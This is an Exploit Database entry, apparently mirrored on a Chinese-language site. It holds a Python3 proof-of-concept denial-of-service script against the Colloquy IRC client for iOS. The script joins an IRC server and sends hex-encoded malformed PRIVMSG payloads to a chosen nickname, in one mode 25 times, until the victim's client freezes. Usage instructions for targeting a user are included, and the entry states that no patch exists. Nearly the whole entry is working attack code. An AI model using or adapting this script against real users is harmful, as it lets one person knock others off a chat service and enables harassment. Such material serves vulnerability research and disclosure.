Colloquy 1.3.5/1.3.6 – Denial of Service

• Exploit Database
• 39 阅读

• 作者： UberLame
  日期： 2013-01-10
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/24023/

• #!/usr/bin/python3
  ###################################################################################
  # Wednesday, January 09, 2013
  #
  #
  #
  #__.__.__ 
  # __| || |_|| ____ ____ |__| ____ ____
  # \ __ /| _/ __ \ / ___\||/_ \ /\ 
  #||||||_\___// /_/>(<_> ) |\
  # /_~~_\____/\___>___/|__|\____/|___|/
  # |_||_| \/_____/\/
  #http://www.zempirians.com
  #
  #00100011 01101100 01100101 01100111 01101001 01101111 01101110
  #
  #
  #
  # -=[ Colloquy - A Mac OS X Internet Chat client. ] =-
  #
  #[P]roof [o]f [C]oncept, Denial of Service
  #
  #
  #
  #
  ###################################################################################
  # #T E A M#
  # #######################
  #
  #UberLame .......> Provided exploit discovery + payloads
  #Aph3x.......> Provided main payload attack for this demostration. <3
  # O_O.......> Built the concept in Python3
  #Apetrick .......> Allowed testing of the exploit against his ipod
  #syk.......> Allowed testing of the exploit against his iphone5
  #
  #
  ###################################################################################
  #SUMMARY #
  ################
  # 
  # This DOS is designed to freeze the client making it impossible to do anything
  # with it. The user will need to manually restart the application in order to
  # continue using it.
  #
  # There are over a few dozen ways to crash the Colloquy client, however, we
  # will only be showing 3 various methods. These glitches were suppose to be
  # fixed in 'Colloquy' 1.3.5, however, they still exist in the lastest release
  # of 1.3.6...
  #
  ################
  #VULNERABLE#
  ################
  #
  # Colloquy 1.3.5 (5534) - iPhone OS 5.1.1 (ARM) - http://colloquy.mobi
  #Colloquy 1.3.6 (5575) - iPhone OS 6.0.2 (ARM) - http://colloquy.mobi
  #
  ################
  #PATCH #
  ################
  #
  #There is no CVE reported.
  #
  ################
  #PATCH #
  ################
  #
  #There is no PATCH available.
  #
  ###################################################################################
  ## #
  ##H O W - T O#
  ## #
  ########################
  #
  # Provide the Target: Server, Port, Nickname and the script will deliver
  # the payload...
  #
  # [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
  #
  ###################################################################################
  from argparse import ArgumentParser
  from time import sleep
  import socket
  
  
  shellcode = {
  # One Shot <3
  'one_shot': [ \
  "687474703a2f2f782f2e2425235e26402426402426232424242425232426",
  "23242623262340262a232a235e28242923404040245e2340242625232323",
  "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
  "2e24" ],
  
  # 1.3.5 
  '1_3_5': [ \
  "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
  "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
  "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
  "7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
  
  # 1.3.6 - ( Requires Sending 25 Times )
  '1_3_6': [ \
  "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
  "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
  "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
  "7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
  }
  
  def own( sock, target, sc_key='one_shot' ):
  sc = ''.join( shellcode[sc_key] )
  targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
  
  msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
  
  if sc_key not in '1_3_6':
  sock.send( bytes.fromhex( msg ) )
  else:
  try:
  for x in range( 1, 26 ):
  sock.send( bytes.fromhex( msg ) )
  sleep( .64 )
  except:
  print( 'FAILED!')
  
  
  def connect( uri, port, target, sc_key ):
  sock = socket.socket()
  try:
  ret = sock.connect_ex(( uri, int( port ) ))
  sock.recv(8096)
  except:
  print( "\t[-] Failed To Connect To {}".format( uri ) )
  exit()
  
  
  sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" ) 
  sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
  
  while True:
  host_data = str( sock.recv( 8096 ).strip() )
  
  
  if ' 396 ' in host_data:
  print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
  own( sock, target, sc_key )
  sock.send( b'QUIT\r\n' )
  sock.close()
  break
  
  
  try: 
  msg = host_data.split()
  if msg[0].lower() is 'ping':
  sock.send( b"PONG {}\r\n".format( msg[1] ) )
  continue
  except:
  pass
  
  
  print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )
  
  
  
  if __name__ == '__main__':
  parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
  
  parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
  parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
  parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
  
  parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
  help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
  
  
  
  args = parser.parse_args()
  
  if args.nick is None:
  parser.print_help()
  exit()
  
  connect( args.target, args.port, args.nick, args.shellcode.strip() )